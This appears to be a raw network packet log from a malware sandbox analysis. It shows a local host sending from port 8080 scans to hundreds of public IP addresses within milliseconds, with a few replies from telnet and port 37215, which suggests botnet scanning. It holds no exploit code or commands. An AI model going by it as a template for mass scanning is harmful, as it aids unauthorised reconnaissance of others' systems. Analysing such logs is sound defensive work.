                                              Nov 23, 2023 05:14:49.625854015 CET542028080192.168.2.1395.244.119.130
                                              Nov 23, 2023 05:14:49.625864029 CET542028080192.168.2.1331.130.201.243
                                              Nov 23, 2023 05:14:49.625875950 CET542028080192.168.2.1394.151.231.94
                                              Nov 23, 2023 05:14:49.625885010 CET542028080192.168.2.1331.83.47.221
                                              Nov 23, 2023 05:14:49.625889063 CET542028080192.168.2.1362.78.52.111
                                              Nov 23, 2023 05:14:49.625890017 CET542028080192.168.2.1394.255.196.179
                                              Nov 23, 2023 05:14:49.625890017 CET542028080192.168.2.1331.224.156.134
                                              Nov 23, 2023 05:14:49.625895977 CET542028080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:49.625895977 CET542028080192.168.2.1395.188.199.236
                                              Nov 23, 2023 05:14:49.625896931 CET542028080192.168.2.1362.126.201.198
                                              Nov 23, 2023 05:14:49.625912905 CET542028080192.168.2.1395.91.247.161
                                              Nov 23, 2023 05:14:49.625912905 CET542028080192.168.2.1385.234.150.212
                                              Nov 23, 2023 05:14:49.625920057 CET542028080192.168.2.1331.47.96.71
                                              Nov 23, 2023 05:14:49.625924110 CET542028080192.168.2.1362.221.230.77
                                              Nov 23, 2023 05:14:49.625929117 CET542028080192.168.2.1395.218.100.195
                                              Nov 23, 2023 05:14:49.625935078 CET542028080192.168.2.1385.35.133.148
                                              Nov 23, 2023 05:14:49.625937939 CET542028080192.168.2.1362.8.80.7
                                              Nov 23, 2023 05:14:49.625945091 CET542028080192.168.2.1395.140.234.157
                                              Nov 23, 2023 05:14:49.625958920 CET542028080192.168.2.1385.181.18.217
                                              Nov 23, 2023 05:14:49.625961065 CET542028080192.168.2.1385.61.105.149
                                              Nov 23, 2023 05:14:49.625962973 CET542028080192.168.2.1331.205.209.104
                                              Nov 23, 2023 05:14:49.625963926 CET542028080192.168.2.1362.14.82.197
                                              Nov 23, 2023 05:14:49.625963926 CET542028080192.168.2.1362.64.232.205
                                              Nov 23, 2023 05:14:49.625968933 CET542028080192.168.2.1394.204.101.175
                                              Nov 23, 2023 05:14:49.625982046 CET542028080192.168.2.1394.47.171.169
                                              Nov 23, 2023 05:14:49.625983000 CET542028080192.168.2.1394.107.74.1
                                              Nov 23, 2023 05:14:49.625983953 CET542028080192.168.2.1331.94.225.141
                                              Nov 23, 2023 05:14:49.625988960 CET542028080192.168.2.1331.92.248.27
                                              Nov 23, 2023 05:14:49.625996113 CET542028080192.168.2.1362.105.58.99
                                              Nov 23, 2023 05:14:49.625996113 CET542028080192.168.2.1362.208.90.171
                                              Nov 23, 2023 05:14:49.626015902 CET542028080192.168.2.1395.208.201.126
                                              Nov 23, 2023 05:14:49.626017094 CET542028080192.168.2.1331.98.211.33
                                              Nov 23, 2023 05:14:49.626023054 CET542028080192.168.2.1385.208.141.82
                                              Nov 23, 2023 05:14:49.626023054 CET542028080192.168.2.1395.179.231.132
                                              Nov 23, 2023 05:14:49.626024961 CET542028080192.168.2.1362.225.210.137
                                              Nov 23, 2023 05:14:49.626033068 CET542028080192.168.2.1394.219.246.102
                                              Nov 23, 2023 05:14:49.626034021 CET542028080192.168.2.1385.39.238.252
                                              Nov 23, 2023 05:14:49.626043081 CET542028080192.168.2.1395.38.157.122
                                              Nov 23, 2023 05:14:49.626051903 CET542028080192.168.2.1395.111.70.119
                                              Nov 23, 2023 05:14:49.626051903 CET542028080192.168.2.1331.225.1.55
                                              Nov 23, 2023 05:14:49.626051903 CET542028080192.168.2.1385.118.202.225
                                              Nov 23, 2023 05:14:49.626054049 CET542028080192.168.2.1362.193.27.74
                                              Nov 23, 2023 05:14:49.626064062 CET542028080192.168.2.1385.23.17.63
                                              Nov 23, 2023 05:14:49.626071930 CET542028080192.168.2.1385.207.207.249
                                              Nov 23, 2023 05:14:49.626075983 CET542028080192.168.2.1331.49.185.124
                                              Nov 23, 2023 05:14:49.626085997 CET542028080192.168.2.1385.109.107.137
                                              Nov 23, 2023 05:14:49.626096964 CET542028080192.168.2.1395.20.9.121
                                              Nov 23, 2023 05:14:49.626096964 CET542028080192.168.2.1395.121.176.228
                                              Nov 23, 2023 05:14:49.626096964 CET542028080192.168.2.1385.170.90.60
                                              Nov 23, 2023 05:14:49.626101017 CET542028080192.168.2.1331.41.40.129
                                              Nov 23, 2023 05:14:49.626104116 CET542028080192.168.2.1394.11.225.208
                                              Nov 23, 2023 05:14:49.626111984 CET542028080192.168.2.1385.235.96.9
                                              Nov 23, 2023 05:14:49.626112938 CET542028080192.168.2.1395.79.219.214
                                              Nov 23, 2023 05:14:49.626112938 CET542028080192.168.2.1331.33.233.249
                                              Nov 23, 2023 05:14:49.626116991 CET542028080192.168.2.1331.36.114.25
                                              Nov 23, 2023 05:14:49.626133919 CET542028080192.168.2.1385.160.206.224
                                              Nov 23, 2023 05:14:49.626133919 CET542028080192.168.2.1385.59.127.171
                                              Nov 23, 2023 05:14:49.626133919 CET542028080192.168.2.1362.0.70.252
                                              Nov 23, 2023 05:14:49.626137972 CET542028080192.168.2.1331.96.193.129
                                              Nov 23, 2023 05:14:49.626140118 CET542028080192.168.2.1362.68.216.172
                                              Nov 23, 2023 05:14:49.626156092 CET542028080192.168.2.1362.210.121.127
                                              Nov 23, 2023 05:14:49.626157999 CET542028080192.168.2.1362.104.45.176
                                              Nov 23, 2023 05:14:49.626163006 CET542028080192.168.2.1395.224.58.10
                                              Nov 23, 2023 05:14:49.626176119 CET542028080192.168.2.1331.81.203.245
                                              Nov 23, 2023 05:14:49.626183033 CET542028080192.168.2.1385.49.222.233
                                              Nov 23, 2023 05:14:49.626184940 CET542028080192.168.2.1394.143.134.175
                                              Nov 23, 2023 05:14:49.626185894 CET542028080192.168.2.1385.233.191.43
                                              Nov 23, 2023 05:14:49.626204014 CET542028080192.168.2.1362.96.8.237
                                              Nov 23, 2023 05:14:49.626211882 CET542028080192.168.2.1394.211.136.60
                                              Nov 23, 2023 05:14:49.626211882 CET542028080192.168.2.1385.229.33.74
                                              Nov 23, 2023 05:14:49.626211882 CET542028080192.168.2.1362.192.142.253
                                              Nov 23, 2023 05:14:49.626224041 CET542028080192.168.2.1362.221.100.68
                                              Nov 23, 2023 05:14:49.626231909 CET542028080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:49.626231909 CET542028080192.168.2.1331.114.115.103
                                              Nov 23, 2023 05:14:49.626240969 CET542028080192.168.2.1331.183.253.226
                                              Nov 23, 2023 05:14:49.626245022 CET542028080192.168.2.1331.217.111.58
                                              Nov 23, 2023 05:14:49.626259089 CET542028080192.168.2.1395.11.131.87
                                              Nov 23, 2023 05:14:49.626260042 CET542028080192.168.2.1331.32.179.142
                                              Nov 23, 2023 05:14:49.626266003 CET542028080192.168.2.1331.115.125.94
                                              Nov 23, 2023 05:14:49.626266003 CET542028080192.168.2.1362.223.29.25
                                              Nov 23, 2023 05:14:49.626267910 CET542028080192.168.2.1362.61.83.1
                                              Nov 23, 2023 05:14:49.626270056 CET542028080192.168.2.1394.146.187.63
                                              Nov 23, 2023 05:14:49.626270056 CET542028080192.168.2.1394.209.16.222
                                              Nov 23, 2023 05:14:49.626274109 CET542028080192.168.2.1331.146.33.66
                                              Nov 23, 2023 05:14:49.626275063 CET542028080192.168.2.1395.35.56.161
                                              Nov 23, 2023 05:14:49.626276016 CET542028080192.168.2.1331.213.214.219
                                              Nov 23, 2023 05:14:49.626276016 CET542028080192.168.2.1362.244.126.52
                                              Nov 23, 2023 05:14:49.626291990 CET542028080192.168.2.1394.156.33.230
                                              Nov 23, 2023 05:14:49.626293898 CET542028080192.168.2.1385.145.44.154
                                              Nov 23, 2023 05:14:49.626301050 CET542028080192.168.2.1395.97.254.83
                                              Nov 23, 2023 05:14:49.626301050 CET542028080192.168.2.1331.183.140.157
                                              Nov 23, 2023 05:14:49.626312971 CET542028080192.168.2.1394.126.7.11
                                              Nov 23, 2023 05:14:49.626312971 CET542028080192.168.2.1362.128.91.253
                                              Nov 23, 2023 05:14:49.626321077 CET542028080192.168.2.1395.82.247.251
                                              Nov 23, 2023 05:14:49.626331091 CET542028080192.168.2.1395.85.88.208
                                              Nov 23, 2023 05:14:49.626333952 CET542028080192.168.2.1331.104.147.255
                                              Nov 23, 2023 05:14:49.626343012 CET542028080192.168.2.1385.6.215.54
                                              Nov 23, 2023 05:14:49.626349926 CET542028080192.168.2.1331.176.176.8
                                              Nov 23, 2023 05:14:49.626354933 CET542028080192.168.2.1362.114.91.51
                                              Nov 23, 2023 05:14:49.626368046 CET542028080192.168.2.1395.210.110.56
                                              Nov 23, 2023 05:14:49.626368999 CET542028080192.168.2.1385.77.223.189
                                              Nov 23, 2023 05:14:49.626370907 CET542028080192.168.2.1331.207.251.21
                                              Nov 23, 2023 05:14:49.626373053 CET542028080192.168.2.1385.155.51.196
                                              Nov 23, 2023 05:14:49.626383066 CET542028080192.168.2.1385.184.168.206
                                              Nov 23, 2023 05:14:49.626394987 CET542028080192.168.2.1362.234.27.115
                                              Nov 23, 2023 05:14:49.626403093 CET542028080192.168.2.1385.160.227.157
                                              Nov 23, 2023 05:14:49.626418114 CET542028080192.168.2.1385.164.125.249
                                              Nov 23, 2023 05:14:49.626418114 CET542028080192.168.2.1385.73.86.247
                                              Nov 23, 2023 05:14:49.626422882 CET542028080192.168.2.1395.179.250.82
                                              Nov 23, 2023 05:14:49.626435995 CET542028080192.168.2.1331.12.96.70
                                              Nov 23, 2023 05:14:49.626436949 CET542028080192.168.2.1394.174.220.6
                                              Nov 23, 2023 05:14:49.626441002 CET542028080192.168.2.1331.239.28.139
                                              Nov 23, 2023 05:14:49.626451015 CET542028080192.168.2.1331.24.252.106
                                              Nov 23, 2023 05:14:49.626455069 CET542028080192.168.2.1385.136.231.226
                                              Nov 23, 2023 05:14:49.626455069 CET542028080192.168.2.1331.193.97.0
                                              Nov 23, 2023 05:14:49.626461029 CET542028080192.168.2.1385.231.30.227
                                              Nov 23, 2023 05:14:49.626461029 CET542028080192.168.2.1394.160.88.244
                                              Nov 23, 2023 05:14:49.626463890 CET542028080192.168.2.1394.134.140.93
                                              Nov 23, 2023 05:14:49.626463890 CET542028080192.168.2.1394.174.169.87
                                              Nov 23, 2023 05:14:49.626467943 CET542028080192.168.2.1362.35.219.104
                                              Nov 23, 2023 05:14:49.626467943 CET542028080192.168.2.1394.160.3.172
                                              Nov 23, 2023 05:14:49.626477003 CET542028080192.168.2.1385.53.79.226
                                              Nov 23, 2023 05:14:49.626487017 CET542028080192.168.2.1394.129.137.9
                                              Nov 23, 2023 05:14:49.626490116 CET542028080192.168.2.1395.37.170.0
                                              Nov 23, 2023 05:14:49.626497030 CET542028080192.168.2.1331.140.195.8
                                              Nov 23, 2023 05:14:49.626504898 CET542028080192.168.2.1395.131.42.37
                                              Nov 23, 2023 05:14:49.626506090 CET542028080192.168.2.1394.71.137.215
                                              Nov 23, 2023 05:14:49.626513958 CET542028080192.168.2.1362.231.31.114
                                              Nov 23, 2023 05:14:49.626518011 CET542028080192.168.2.1385.242.136.250
                                              Nov 23, 2023 05:14:49.626526117 CET542028080192.168.2.1331.79.43.99
                                              Nov 23, 2023 05:14:49.626533985 CET542028080192.168.2.1385.75.3.37
                                              Nov 23, 2023 05:14:49.626535892 CET542028080192.168.2.1395.39.245.140
                                              Nov 23, 2023 05:14:49.626537085 CET542028080192.168.2.1385.107.40.44
                                              Nov 23, 2023 05:14:49.626538992 CET542028080192.168.2.1394.236.139.5
                                              Nov 23, 2023 05:14:49.626538992 CET542028080192.168.2.1395.113.152.61
                                              Nov 23, 2023 05:14:49.626549959 CET542028080192.168.2.1362.31.51.85
                                              Nov 23, 2023 05:14:49.626557112 CET542028080192.168.2.1394.208.223.119
                                              Nov 23, 2023 05:14:49.626570940 CET542028080192.168.2.1331.186.243.143
                                              Nov 23, 2023 05:14:49.626574039 CET542028080192.168.2.1331.68.161.165
                                              Nov 23, 2023 05:14:49.626574039 CET542028080192.168.2.1385.110.173.221
                                              Nov 23, 2023 05:14:49.626579046 CET542028080192.168.2.1385.162.84.192
                                              Nov 23, 2023 05:14:49.626597881 CET542028080192.168.2.1331.174.11.153
                                              Nov 23, 2023 05:14:49.626599073 CET542028080192.168.2.1385.116.185.118
                                              Nov 23, 2023 05:14:49.626597881 CET542028080192.168.2.1395.131.16.110
                                              Nov 23, 2023 05:14:49.626600981 CET542028080192.168.2.1362.143.146.52
                                              Nov 23, 2023 05:14:49.626600981 CET542028080192.168.2.1362.213.80.133
                                              Nov 23, 2023 05:14:49.626610041 CET542028080192.168.2.1331.87.167.65
                                              Nov 23, 2023 05:14:49.626619101 CET542028080192.168.2.1331.81.82.108
                                              Nov 23, 2023 05:14:49.626621008 CET542028080192.168.2.1385.201.227.238
                                              Nov 23, 2023 05:14:49.626636982 CET542028080192.168.2.1362.3.75.154
                                              Nov 23, 2023 05:14:49.626636982 CET542028080192.168.2.1362.144.161.247
                                              Nov 23, 2023 05:14:49.626641989 CET542028080192.168.2.1385.195.33.0
                                              Nov 23, 2023 05:14:49.626641989 CET542028080192.168.2.1394.125.183.196
                                              Nov 23, 2023 05:14:49.626662970 CET542028080192.168.2.1385.78.28.87
                                              Nov 23, 2023 05:14:49.626665115 CET542028080192.168.2.1385.19.91.174
                                              Nov 23, 2023 05:14:49.626668930 CET542028080192.168.2.1362.238.253.233
                                              Nov 23, 2023 05:14:49.626668930 CET542028080192.168.2.1394.5.77.177
                                              Nov 23, 2023 05:14:49.626672029 CET542028080192.168.2.1394.212.36.108
                                              Nov 23, 2023 05:14:49.626672983 CET542028080192.168.2.1395.255.151.8
                                              Nov 23, 2023 05:14:49.626672983 CET542028080192.168.2.1331.41.19.229
                                              Nov 23, 2023 05:14:49.626672983 CET542028080192.168.2.1395.195.248.146
                                              Nov 23, 2023 05:14:49.626672983 CET542028080192.168.2.1394.62.241.85
                                              Nov 23, 2023 05:14:49.626682997 CET542028080192.168.2.1385.105.125.212
                                              Nov 23, 2023 05:14:49.626688004 CET542028080192.168.2.1395.100.183.222
                                              Nov 23, 2023 05:14:49.626698971 CET542028080192.168.2.1385.147.56.171
                                              Nov 23, 2023 05:14:49.626703024 CET542028080192.168.2.1385.13.235.139
                                              Nov 23, 2023 05:14:49.626707077 CET542028080192.168.2.1362.112.59.208
                                              Nov 23, 2023 05:14:49.626719952 CET542028080192.168.2.1395.129.180.51
                                              Nov 23, 2023 05:14:49.626723051 CET542028080192.168.2.1331.3.14.4
                                              Nov 23, 2023 05:14:49.626729965 CET542028080192.168.2.1331.217.194.153
                                              Nov 23, 2023 05:14:49.626732111 CET542028080192.168.2.1395.224.20.82
                                              Nov 23, 2023 05:14:49.626733065 CET542028080192.168.2.1362.109.138.206
                                              Nov 23, 2023 05:14:49.626746893 CET542028080192.168.2.1331.242.18.118
                                              Nov 23, 2023 05:14:49.626753092 CET542028080192.168.2.1331.140.22.244
                                              Nov 23, 2023 05:14:49.626753092 CET542028080192.168.2.1394.23.66.148
                                              Nov 23, 2023 05:14:49.626760006 CET542028080192.168.2.1362.99.195.42
                                              Nov 23, 2023 05:14:49.626771927 CET542028080192.168.2.1331.14.49.216
                                              Nov 23, 2023 05:14:49.626773119 CET542028080192.168.2.1385.131.187.245
                                              Nov 23, 2023 05:14:49.626773119 CET542028080192.168.2.1331.93.48.217
                                              Nov 23, 2023 05:14:49.626775980 CET542028080192.168.2.1395.82.127.92
                                              Nov 23, 2023 05:14:49.626775980 CET542028080192.168.2.1362.86.243.140
                                              Nov 23, 2023 05:14:49.626780033 CET542028080192.168.2.1385.86.124.97
                                              Nov 23, 2023 05:14:49.626792908 CET542028080192.168.2.1331.2.240.170
                                              Nov 23, 2023 05:14:49.626802921 CET542028080192.168.2.1394.171.113.116
                                              Nov 23, 2023 05:14:49.626802921 CET542028080192.168.2.1394.70.121.153
                                              Nov 23, 2023 05:14:49.626804113 CET542028080192.168.2.1395.0.147.111
                                              Nov 23, 2023 05:14:49.626815081 CET542028080192.168.2.1331.216.167.124
                                              Nov 23, 2023 05:14:49.626816988 CET542028080192.168.2.1331.36.102.238
                                              Nov 23, 2023 05:14:49.626817942 CET542028080192.168.2.1394.231.8.154
                                              Nov 23, 2023 05:14:49.626822948 CET542028080192.168.2.1395.253.177.2
                                              Nov 23, 2023 05:14:49.626823902 CET542028080192.168.2.1331.203.17.53
                                              Nov 23, 2023 05:14:49.626832008 CET542028080192.168.2.1331.154.217.109
                                              Nov 23, 2023 05:14:49.626844883 CET542028080192.168.2.1385.99.12.36
                                              Nov 23, 2023 05:14:49.626844883 CET542028080192.168.2.1331.80.99.13
                                              Nov 23, 2023 05:14:49.626848936 CET542028080192.168.2.1395.14.55.59
                                              Nov 23, 2023 05:14:49.626862049 CET542028080192.168.2.1331.145.26.47
                                              Nov 23, 2023 05:14:49.626863003 CET542028080192.168.2.1394.120.160.51
                                              Nov 23, 2023 05:14:49.626869917 CET542028080192.168.2.1395.210.142.189
                                              Nov 23, 2023 05:14:49.626887083 CET542028080192.168.2.1331.236.29.212
                                              Nov 23, 2023 05:14:49.626893044 CET542028080192.168.2.1394.195.179.75
                                              Nov 23, 2023 05:14:49.626893044 CET542028080192.168.2.1331.118.26.248
                                              Nov 23, 2023 05:14:49.626893044 CET542028080192.168.2.1362.77.140.175
                                              Nov 23, 2023 05:14:49.626895905 CET542028080192.168.2.1385.214.9.132
                                              Nov 23, 2023 05:14:49.626908064 CET542028080192.168.2.1362.18.197.178
                                              Nov 23, 2023 05:14:49.626908064 CET542028080192.168.2.1362.35.237.135
                                              Nov 23, 2023 05:14:49.626918077 CET542028080192.168.2.1362.16.44.28
                                              Nov 23, 2023 05:14:49.626921892 CET542028080192.168.2.1331.30.72.79
                                              Nov 23, 2023 05:14:49.626929045 CET542028080192.168.2.1395.183.32.103
                                              Nov 23, 2023 05:14:49.626930952 CET542028080192.168.2.1395.220.226.158
                                              Nov 23, 2023 05:14:49.626940012 CET542028080192.168.2.1331.63.240.115
                                              Nov 23, 2023 05:14:49.626945972 CET542028080192.168.2.1362.255.112.212
                                              Nov 23, 2023 05:14:49.626949072 CET542028080192.168.2.1394.248.174.97
                                              Nov 23, 2023 05:14:49.626961946 CET542028080192.168.2.1362.139.143.213
                                              Nov 23, 2023 05:14:49.626965046 CET542028080192.168.2.1394.32.169.30
                                              Nov 23, 2023 05:14:49.626969099 CET542028080192.168.2.1331.16.67.143
                                              Nov 23, 2023 05:14:49.626969099 CET542028080192.168.2.1385.70.150.91
                                              Nov 23, 2023 05:14:49.626972914 CET542028080192.168.2.1394.253.241.38
                                              Nov 23, 2023 05:14:49.626981020 CET542028080192.168.2.1331.176.169.154
                                              Nov 23, 2023 05:14:49.626996040 CET542028080192.168.2.1362.51.141.61
                                              Nov 23, 2023 05:14:49.626996040 CET542028080192.168.2.1385.208.230.60
                                              Nov 23, 2023 05:14:49.626996040 CET542028080192.168.2.1395.82.156.62
                                              Nov 23, 2023 05:14:49.627006054 CET542028080192.168.2.1395.107.194.214
                                              Nov 23, 2023 05:14:49.627017021 CET542028080192.168.2.1362.72.114.33
                                              Nov 23, 2023 05:14:49.627026081 CET542028080192.168.2.1385.200.31.7
                                              Nov 23, 2023 05:14:49.627026081 CET542028080192.168.2.1385.11.165.187
                                              Nov 23, 2023 05:14:49.627026081 CET542028080192.168.2.1395.116.88.155
                                              Nov 23, 2023 05:14:49.627026081 CET542028080192.168.2.1385.194.73.109
                                              Nov 23, 2023 05:14:49.627034903 CET542028080192.168.2.1362.122.173.101
                                              Nov 23, 2023 05:14:49.627046108 CET542028080192.168.2.1385.21.184.243
                                              Nov 23, 2023 05:14:49.627046108 CET542028080192.168.2.1331.160.13.139
                                              Nov 23, 2023 05:14:49.627054930 CET542028080192.168.2.1395.152.231.50
                                              Nov 23, 2023 05:14:49.627057076 CET542028080192.168.2.1385.223.171.30
                                              Nov 23, 2023 05:14:49.627057076 CET542028080192.168.2.1362.156.103.161
                                              Nov 23, 2023 05:14:49.627057076 CET542028080192.168.2.1385.52.124.245
                                              Nov 23, 2023 05:14:49.627059937 CET542028080192.168.2.1395.188.70.45
                                              Nov 23, 2023 05:14:49.627062082 CET542028080192.168.2.1394.120.179.179
                                              Nov 23, 2023 05:14:49.627072096 CET542028080192.168.2.1394.184.65.69
                                              Nov 23, 2023 05:14:49.627079010 CET542028080192.168.2.1385.58.182.59
                                              Nov 23, 2023 05:14:49.627083063 CET542028080192.168.2.1385.66.122.157
                                              Nov 23, 2023 05:14:49.627089977 CET542028080192.168.2.1395.55.221.147
                                              Nov 23, 2023 05:14:49.627103090 CET542028080192.168.2.1394.98.100.16
                                              Nov 23, 2023 05:14:49.627103090 CET542028080192.168.2.1394.27.15.142
                                              Nov 23, 2023 05:14:49.627101898 CET542028080192.168.2.1395.189.45.37
                                              Nov 23, 2023 05:14:49.627115011 CET542028080192.168.2.1331.115.151.225
                                              Nov 23, 2023 05:14:49.627124071 CET542028080192.168.2.1395.161.207.26
                                              Nov 23, 2023 05:14:49.627125978 CET542028080192.168.2.1395.51.119.196
                                              Nov 23, 2023 05:14:49.627126932 CET542028080192.168.2.1362.75.162.45
                                              Nov 23, 2023 05:14:49.627140045 CET542028080192.168.2.1395.90.91.70
                                              Nov 23, 2023 05:14:49.627146006 CET542028080192.168.2.1331.52.132.5
                                              Nov 23, 2023 05:14:49.627154112 CET542028080192.168.2.1331.8.119.4
                                              Nov 23, 2023 05:14:49.627156019 CET542028080192.168.2.1394.148.17.60
                                              Nov 23, 2023 05:14:49.627156973 CET542028080192.168.2.1394.135.51.96
                                              Nov 23, 2023 05:14:49.627162933 CET542028080192.168.2.1331.92.71.181
                                              Nov 23, 2023 05:14:49.627170086 CET542028080192.168.2.1362.163.128.4
                                              Nov 23, 2023 05:14:49.627177954 CET542028080192.168.2.1362.111.172.211
                                              Nov 23, 2023 05:14:49.627182007 CET542028080192.168.2.1362.219.177.192
                                              Nov 23, 2023 05:14:49.627187014 CET542028080192.168.2.1331.151.236.146
                                              Nov 23, 2023 05:14:49.627197027 CET542028080192.168.2.1395.55.225.124
                                              Nov 23, 2023 05:14:49.627197027 CET542028080192.168.2.1395.101.55.246
                                              Nov 23, 2023 05:14:49.627197027 CET542028080192.168.2.1362.15.128.192
                                              Nov 23, 2023 05:14:49.627202034 CET542028080192.168.2.1331.7.60.25
                                              Nov 23, 2023 05:14:49.627219915 CET542028080192.168.2.1331.235.172.148
                                              Nov 23, 2023 05:14:49.627223969 CET542028080192.168.2.1385.33.39.97
                                              Nov 23, 2023 05:14:49.627233982 CET542028080192.168.2.1385.236.52.116
                                              Nov 23, 2023 05:14:49.627240896 CET542028080192.168.2.1394.140.111.79
                                              Nov 23, 2023 05:14:49.627254963 CET542028080192.168.2.1394.45.110.234
                                              Nov 23, 2023 05:14:49.627255917 CET542028080192.168.2.1331.224.53.253
                                              Nov 23, 2023 05:14:49.627257109 CET542028080192.168.2.1331.189.34.180
                                              Nov 23, 2023 05:14:49.627265930 CET542028080192.168.2.1362.211.247.169
                                              Nov 23, 2023 05:14:49.627270937 CET542028080192.168.2.1331.185.218.113
                                              Nov 23, 2023 05:14:49.627275944 CET542028080192.168.2.1362.239.87.204
                                              Nov 23, 2023 05:14:49.627281904 CET542028080192.168.2.1394.2.32.126
                                              Nov 23, 2023 05:14:49.627290964 CET542028080192.168.2.1385.14.34.86
                                              Nov 23, 2023 05:14:49.627294064 CET542028080192.168.2.1395.235.182.62
                                              Nov 23, 2023 05:14:49.627301931 CET542028080192.168.2.1331.242.87.104
                                              Nov 23, 2023 05:14:49.627307892 CET542028080192.168.2.1331.243.167.165
                                              Nov 23, 2023 05:14:49.627307892 CET542028080192.168.2.1395.95.228.185
                                              Nov 23, 2023 05:14:49.627317905 CET542028080192.168.2.1395.152.124.27
                                              Nov 23, 2023 05:14:49.627326012 CET542028080192.168.2.1331.197.204.226
                                              Nov 23, 2023 05:14:49.627331018 CET542028080192.168.2.1331.123.41.184
                                              Nov 23, 2023 05:14:49.627332926 CET542028080192.168.2.1331.66.83.103
                                              Nov 23, 2023 05:14:49.627346039 CET542028080192.168.2.1385.39.226.255
                                              Nov 23, 2023 05:14:49.627346992 CET542028080192.168.2.1394.149.139.246
                                              Nov 23, 2023 05:14:49.627346992 CET542028080192.168.2.1385.29.147.144
                                              Nov 23, 2023 05:14:49.627358913 CET542028080192.168.2.1362.229.244.16
                                              Nov 23, 2023 05:14:49.627358913 CET542028080192.168.2.1362.131.47.224
                                              Nov 23, 2023 05:14:49.627370119 CET542028080192.168.2.1395.82.207.42
                                              Nov 23, 2023 05:14:49.627372026 CET542028080192.168.2.1394.111.213.75
                                              Nov 23, 2023 05:14:49.627381086 CET542028080192.168.2.1385.254.130.184
                                              Nov 23, 2023 05:14:49.627384901 CET542028080192.168.2.1395.254.155.107
                                              Nov 23, 2023 05:14:49.627392054 CET542028080192.168.2.1395.95.126.119
                                              Nov 23, 2023 05:14:49.627392054 CET542028080192.168.2.1395.236.37.227
                                              Nov 23, 2023 05:14:49.627408981 CET542028080192.168.2.1385.119.177.82
                                              Nov 23, 2023 05:14:49.627409935 CET542028080192.168.2.1331.193.235.216
                                              Nov 23, 2023 05:14:49.627410889 CET542028080192.168.2.1394.124.68.141
                                              Nov 23, 2023 05:14:49.627427101 CET542028080192.168.2.1331.10.162.215
                                              Nov 23, 2023 05:14:49.627432108 CET542028080192.168.2.1385.166.111.45
                                              Nov 23, 2023 05:14:49.627435923 CET542028080192.168.2.1331.68.98.175
                                              Nov 23, 2023 05:14:49.627438068 CET542028080192.168.2.1394.233.175.238
                                              Nov 23, 2023 05:14:49.627453089 CET542028080192.168.2.1394.153.201.190
                                              Nov 23, 2023 05:14:49.627454042 CET542028080192.168.2.1362.159.26.130
                                              Nov 23, 2023 05:14:49.627456903 CET542028080192.168.2.1331.180.190.231
                                              Nov 23, 2023 05:14:49.627465010 CET542028080192.168.2.1362.88.241.229
                                              Nov 23, 2023 05:14:49.627477884 CET542028080192.168.2.1385.20.237.50
                                              Nov 23, 2023 05:14:49.627479076 CET542028080192.168.2.1394.222.237.1
                                              Nov 23, 2023 05:14:49.627486944 CET542028080192.168.2.1331.69.163.127
                                              Nov 23, 2023 05:14:49.627487898 CET542028080192.168.2.1395.49.162.0
                                              Nov 23, 2023 05:14:49.627495050 CET542028080192.168.2.1331.22.61.127
                                              Nov 23, 2023 05:14:49.627506018 CET542028080192.168.2.1395.41.128.66
                                              Nov 23, 2023 05:14:49.627506018 CET542028080192.168.2.1395.206.118.50
                                              Nov 23, 2023 05:14:49.627522945 CET542028080192.168.2.1331.81.184.238
                                              Nov 23, 2023 05:14:49.627522945 CET542028080192.168.2.1394.58.84.31
                                              Nov 23, 2023 05:14:49.627523899 CET542028080192.168.2.1394.132.234.40
                                              Nov 23, 2023 05:14:49.627525091 CET542028080192.168.2.1394.117.73.123
                                              Nov 23, 2023 05:14:49.627530098 CET542028080192.168.2.1362.58.114.245
                                              Nov 23, 2023 05:14:49.627541065 CET542028080192.168.2.1362.164.153.0
                                              Nov 23, 2023 05:14:49.627545118 CET542028080192.168.2.1394.76.192.169
                                              Nov 23, 2023 05:14:49.627552032 CET542028080192.168.2.1362.52.195.68
                                              Nov 23, 2023 05:14:49.627557039 CET542028080192.168.2.1394.36.47.74
                                              Nov 23, 2023 05:14:49.627562046 CET542028080192.168.2.1395.199.29.151
                                              Nov 23, 2023 05:14:49.627573013 CET542028080192.168.2.1395.46.24.152
                                              Nov 23, 2023 05:14:49.627573013 CET542028080192.168.2.1395.68.106.26
                                              Nov 23, 2023 05:14:49.627573967 CET542028080192.168.2.1385.65.211.38
                                              Nov 23, 2023 05:14:49.627583027 CET542028080192.168.2.1362.60.30.151
                                              Nov 23, 2023 05:14:49.627585888 CET542028080192.168.2.1331.35.7.9
                                              Nov 23, 2023 05:14:49.627585888 CET542028080192.168.2.1395.236.218.202
                                              Nov 23, 2023 05:14:49.627600908 CET542028080192.168.2.1362.217.243.189
                                              Nov 23, 2023 05:14:49.627600908 CET542028080192.168.2.1394.47.197.74
                                              Nov 23, 2023 05:14:49.627600908 CET542028080192.168.2.1331.51.188.88
                                              Nov 23, 2023 05:14:49.627612114 CET542028080192.168.2.1362.205.148.183
                                              Nov 23, 2023 05:14:49.627612114 CET542028080192.168.2.1394.91.118.35
                                              Nov 23, 2023 05:14:49.627623081 CET542028080192.168.2.1394.206.77.67
                                              Nov 23, 2023 05:14:49.627623081 CET542028080192.168.2.1394.153.213.198
                                              Nov 23, 2023 05:14:49.627633095 CET542028080192.168.2.1395.72.220.167
                                              Nov 23, 2023 05:14:49.627649069 CET542028080192.168.2.1331.236.67.31
                                              Nov 23, 2023 05:14:49.627650023 CET542028080192.168.2.1395.168.179.197
                                              Nov 23, 2023 05:14:49.627654076 CET542028080192.168.2.1395.197.70.149
                                              Nov 23, 2023 05:14:49.627662897 CET542028080192.168.2.1331.231.37.102
                                              Nov 23, 2023 05:14:49.627667904 CET542028080192.168.2.1394.49.109.18
                                              Nov 23, 2023 05:14:49.627898932 CET361548080192.168.2.1331.136.47.50
                                              Nov 23, 2023 05:14:49.627966881 CET477008080192.168.2.1395.86.82.175
                                              Nov 23, 2023 05:14:49.698373079 CET2355738171.22.53.167192.168.2.13
                                              Nov 23, 2023 05:14:49.700076103 CET2355738165.22.38.240192.168.2.13
                                              Nov 23, 2023 05:14:49.726079941 CET80805420294.131.24.201192.168.2.13
                                              Nov 23, 2023 05:14:49.726352930 CET80805420294.131.20.222192.168.2.13
                                              Nov 23, 2023 05:14:49.779021978 CET23557385.187.1.197192.168.2.13
                                              Nov 23, 2023 05:14:49.802155972 CET3721554970156.19.192.134192.168.2.13
                                              Nov 23, 2023 05:14:49.810646057 CET80805420294.119.15.126192.168.2.13
